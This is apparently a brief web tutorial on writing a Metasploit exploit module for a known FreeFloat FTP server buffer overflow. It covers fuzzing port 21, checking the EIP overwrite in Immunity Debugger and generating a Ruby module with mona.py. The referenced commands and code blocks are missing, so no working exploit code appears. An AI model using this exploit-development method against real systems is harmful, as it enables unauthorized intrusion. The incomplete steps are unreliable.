Types of Exploits
Types of Exploits in Metasploit:
- Active
- Passive
The core difference between these two exploit types is that the active type exploits a specific target before it terminates, whereas the passive type waits until an incoming host connects before exploiting. It helps to know these beforehand, as the difference will play a clearer role when you graduate to writing more complicated exploits.
Our Setup
The software we will use in this tutorial include the following:
The exploit: For the purpose of this short guide, we will be using a pre-existing vulnerability in the freefloat FTP server.
Immunity debugger: This is used in creating exploits and reverse-engineering binary files. You can easily come by a good debugger available online for free.
Windows XP service pack 3 installed
Kali Linux: Obviously, the undisputed leading pen testing aid.
Mona.py: A Python-based plugin that helps with immunity debugging. Download Mona.py and move it to the immunity debugger directory (the py command folder).
The Process
Imitate Fuzzing
We will perform pseudo-fuzzing, which entails flooding the system with random data. We will craft a pattern with 1,000 characters and use it to overwhelm port 21, as it is the FTP server’s command port.
Once the module is executed, fire up the immunity debugger, and make sure that EIP has been overwritten.
Fire Up Mona
With the EIP overwritten, we can further proceed with the immunity debugger. Enter the following:
Select the TCP client and port 21 to continue.
Customize Exploit
You will see a ruby-based file created as a result. You can modify it any way you want. Here, we will rename it to f.rb.
Launch the Exploit in Metasploit
Load the file into Kali Linux and replicate the exploit from the root to the Metasploit framework:
You can see that Metasploit acknowledges the changes and is compatible.
Conclusion
This was a mini-tutorial on how to write a Metasploit exploit. We will discuss more complicated exploits and see how they are written in future articles.
